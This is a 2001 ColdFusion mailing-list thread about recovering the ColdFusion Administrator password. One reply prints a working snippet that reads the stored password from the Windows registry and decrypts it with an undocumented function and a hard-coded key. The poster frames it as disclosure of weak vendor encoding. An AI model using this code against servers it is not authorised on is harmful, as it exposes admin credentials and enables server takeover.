Todd,
It's very easy to retrieve the admin password, and I'm sure I will get
flamed for showing this, but what the hell:
<CFSET CFKey = "4p0L@r1$">
<CFREGISTRY ACTION=GET
Branch="HKEY_LOCAL_MACHINE\SOFTWARE\Allaire\ColdFusion\CurrentVersion\Server
"
Entry="AdminPassword"
Variable="AdminPassword">
<CFOUTPUT>
Registry Password: #CFusion_Decrypt(AdminPassword, CFKey)#
</CFOUTPUT>
The key to decrypt it spells "4 Polaris" (Allaire inside joke?) -- this
isn't my doing; rather, I was sent this from an anonymous source via the
[EMAIL PROTECTED] address. I hope this will show Allaire and ISPs that
there is a need for encryption, not encoding, for things such as this. I am
against template encryption personally, but the administrator feature should
have much better security. We live and learn, strive and yearn.
Dain Anderson
Caretaker, CF Comet
http://www.cfcomet.com/
----- Original Message -----
From: "Todd Ashworth" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Friday, March 09, 2001 5:31 PM
Subject: Re: Finding the CF Administrator password
> Excellent. What they are talking about looks likw what might be in the
> registry. This might just do what I want. If so, that's 2 I owe ya ;)
>
> Todd Ashworth --
> Web Application Developer
> Network Administrator
>
> Saber Corporation
> 314 Oakland Ave.
> Rock Hill, SC 29730
> (803) 327-0137 [111]
>
> ----- Original Message -----
> From: "Jon Hall" <[EMAIL PROTECTED]>
> To: "CF-Talk" <[EMAIL PROTECTED]>
> Sent: Friday, March 09, 2001 5:22 PM
> Subject: Re: Finding the CF Administrator password
>
>
> | Check this link Todd.
> | http://www.fusionauthority.com/alert/index.cfm?alertid=6#Tech1
> |
> | There are undocumented "Administrator" functions called
> | CFusion_Encrypt()/CFusion_Decrypt.
> | These are probably the functions that were used to encrypt the string...
> |
> | jon
>
>
>
>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Structure your ColdFusion code with Fusebox. Get the official book at
http://www.fusionauthority.com/bkinfo.cfm
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists